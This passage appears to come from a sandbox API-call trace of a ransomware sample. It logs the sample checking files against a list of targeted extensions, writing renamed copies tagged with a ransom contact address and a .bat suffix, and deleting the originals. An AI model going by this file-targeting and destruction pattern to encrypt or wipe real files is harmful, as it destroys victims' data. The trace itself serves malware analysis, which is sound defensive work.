dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0055.386] SetEndOfFile (hFile=0x324) returned 1 [0055.386] CloseHandle (hObject=0x324) returned 1 [0055.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0055.387] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0055.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.387] lstrlenW (lpString=".doc") returned 4 [0055.387] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.387] lstrlenW (lpString=".docx") returned 5 [0055.387] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.387] lstrlenW (lpString=".pdf") returned 4 [0055.387] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.387] lstrlenW (lpString=".xls") returned 4 [0055.388] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString=".xlsx") returned 5 [0055.388] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.388] lstrlenW (lpString=".ppt") returned 4 [0055.388] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.388] lstrlenW (lpString=".zip") returned 4 [0055.388] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.388] lstrlenW (lpString=".rar") returned 4 [0055.388] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString=".bz2") returned 4 [0055.388] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString=".7z") returned 3 [0055.388] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.388] lstrlenW (lpString=".dbf") returned 4 [0055.388] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.388] lstrlenW (lpString=".1cd") returned 4 [0055.388] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.388] lstrlenW (lpString=".jpg") returned 4 [0055.388] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.389] lstrlenW (lpString=".doc") returned 4 [0055.389] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString=".docx") returned 5 [0055.389] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.389] lstrlenW (lpString=".pdf") returned 4 [0055.389] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString=".xls") returned 4 [0055.389] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString=".xlsx") returned 5 [0055.389] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.389] lstrlenW (lpString=".ppt") returned 4 [0055.389] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.389] lstrlenW (lpString=".zip") returned 4 [0055.389] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.389] lstrlenW (lpString=".rar") returned 4 [0055.389] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString=".bz2") returned 4 [0055.389] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString=".7z") returned 3 [0055.389] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.389] lstrlenW (lpString=".dbf") returned 4 [0055.389] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.389] lstrlenW (lpString=".1cd") returned 4 [0055.389] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0055.389] lstrlenW (lpString=".jpg") returned 4 [0055.390] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.390] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.390] lstrlenW (lpString="auxbase.xml") returned 11 [0055.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.582] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=1434) returned 1 [0055.582] CloseHandle (hObject=0x2c0) returned 1 [0055.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0055.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.582] lstrlenW (lpString=".doc") returned 4 [0055.582] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.582] lstrlenW (lpString=".docx") returned 5 [0055.582] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.582] lstrlenW (lpString=".pdf") returned 4 [0055.582] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.582] lstrlenW (lpString=".xls") returned 4 [0055.582] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.582] lstrlenW (lpString=".xlsx") returned 5 [0055.582] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.582] lstrlenW (lpString=".ppt") returned 4 [0055.582] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".zip") returned 4 [0055.583] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.583] lstrlenW (lpString=".rar") returned 4 [0055.583] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".bz2") returned 4 [0055.583] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".7z") returned 3 [0055.583] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".dbf") returned 4 [0055.583] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".1cd") returned 4 [0055.583] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".jpg") returned 4 [0055.583] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".doc") returned 4 [0055.583] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".docx") returned 5 [0055.583] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.583] lstrlenW (lpString=".pdf") returned 4 [0055.583] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".xls") returned 4 [0055.583] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".xlsx") returned 5 [0055.583] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.583] lstrlenW (lpString=".ppt") returned 4 [0055.583] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.583] lstrlenW (lpString=".zip") returned 4 [0055.583] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.583] lstrlenW (lpString=".rar") returned 4 [0055.583] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.583] lstrlenW (lpString=".bz2") returned 4 [0055.584] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.584] lstrlenW (lpString=".7z") returned 3 [0055.584] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.584] lstrlenW (lpString=".dbf") returned 4 [0055.584] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.584] lstrlenW (lpString=".1cd") returned 4 [0055.584] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0055.584] lstrlenW (lpString=".jpg") returned 4 [0055.584] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.584] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.584] lstrlenW (lpString="auxpad.xml") returned 10 [0055.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.592] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=212) returned 1 [0055.592] CloseHandle (hObject=0x2c4) returned 1 [0055.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0055.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.592] lstrlenW (lpString=".doc") returned 4 [0055.592] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.592] lstrlenW (lpString=".docx") returned 5 [0055.592] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0055.592] lstrlenW (lpString=".pdf") returned 4 [0055.592] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.592] lstrlenW (lpString=".xls") returned 4 [0055.593] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".xlsx") returned 5 [0055.593] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0055.593] lstrlenW (lpString=".ppt") returned 4 [0055.593] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString=".zip") returned 4 [0055.593] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.593] lstrlenW (lpString=".rar") returned 4 [0055.593] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".bz2") returned 4 [0055.593] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".7z") returned 3 [0055.593] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString=".dbf") returned 4 [0055.593] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString=".1cd") returned 4 [0055.593] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString=".jpg") returned 4 [0055.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.593] lstrlenW (lpString=".doc") returned 4 [0055.593] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".docx") returned 5 [0055.593] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0055.593] lstrlenW (lpString=".pdf") returned 4 [0055.593] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".xls") returned 4 [0055.593] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.593] lstrlenW (lpString=".xlsx") returned 5 [0055.593] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0055.593] lstrlenW (lpString=".ppt") returned 4 [0055.593] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.594] lstrlenW (lpString=".zip") returned 4 [0055.594] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.594] lstrlenW (lpString=".rar") returned 4 [0055.594] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.594] lstrlenW (lpString=".bz2") returned 4 [0055.594] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.594] lstrlenW (lpString=".7z") returned 3 [0055.594] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.594] lstrlenW (lpString=".dbf") returned 4 [0055.594] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.594] lstrlenW (lpString=".1cd") returned 4 [0055.594] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0055.594] lstrlenW (lpString=".jpg") returned 4 [0055.594] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.594] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.594] lstrlenW (lpString="insert.xml") returned 10 [0055.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.603] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=215) returned 1 [0055.603] CloseHandle (hObject=0x2c4) returned 1 [0055.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml")) returned 0x20 [0055.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.603] lstrlenW (lpString=".doc") returned 4 [0055.603] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.603] lstrlenW (lpString=".docx") returned 5 [0055.603] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.603] lstrlenW (lpString=".pdf") returned 4 [0055.603] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.603] lstrlenW (lpString=".xls") returned 4 [0055.603] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.603] lstrlenW (lpString=".xlsx") returned 5 [0055.603] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.603] lstrlenW (lpString=".ppt") returned 4 [0055.603] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.603] lstrlenW (lpString=".zip") returned 4 [0055.604] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.604] lstrlenW (lpString=".rar") returned 4 [0055.604] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".bz2") returned 4 [0055.604] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".7z") returned 3 [0055.604] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString=".dbf") returned 4 [0055.604] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString=".1cd") returned 4 [0055.604] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString=".jpg") returned 4 [0055.604] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString=".doc") returned 4 [0055.604] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".docx") returned 5 [0055.604] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.604] lstrlenW (lpString=".pdf") returned 4 [0055.604] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".xls") returned 4 [0055.604] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".xlsx") returned 5 [0055.604] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.604] lstrlenW (lpString=".ppt") returned 4 [0055.604] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.604] lstrlenW (lpString=".zip") returned 4 [0055.604] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.604] lstrlenW (lpString=".rar") returned 4 [0055.604] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.604] lstrlenW (lpString=".bz2") returned 4 [0055.605] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.605] lstrlenW (lpString=".7z") returned 3 [0055.605] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.605] lstrlenW (lpString=".dbf") returned 4 [0055.605] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.605] lstrlenW (lpString=".1cd") returned 4 [0055.605] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0055.605] lstrlenW (lpString=".jpg") returned 4 [0055.605] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.605] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.605] lstrlenW (lpString="keypadbase.xml") returned 14 [0055.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0055.619] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=903) returned 1 [0055.619] CloseHandle (hObject=0x334) returned 1 [0055.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0055.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString=".doc") returned 4 [0055.624] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString=".docx") returned 5 [0055.624] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.624] lstrlenW (lpString=".pdf") returned 4 [0055.624] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString=".xls") returned 4 [0055.624] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString=".xlsx") returned 5 [0055.624] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.624] lstrlenW (lpString=".ppt") returned 4 [0055.624] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString=".zip") returned 4 [0055.624] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.624] lstrlenW (lpString=".rar") returned 4 [0055.624] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString=".bz2") returned 4 [0055.624] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.624] lstrlenW (lpString=".7z") returned 3 [0055.624] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.624] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0055.624] lstrlenW (lpString=".dbf") returned 4 [0055.624] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 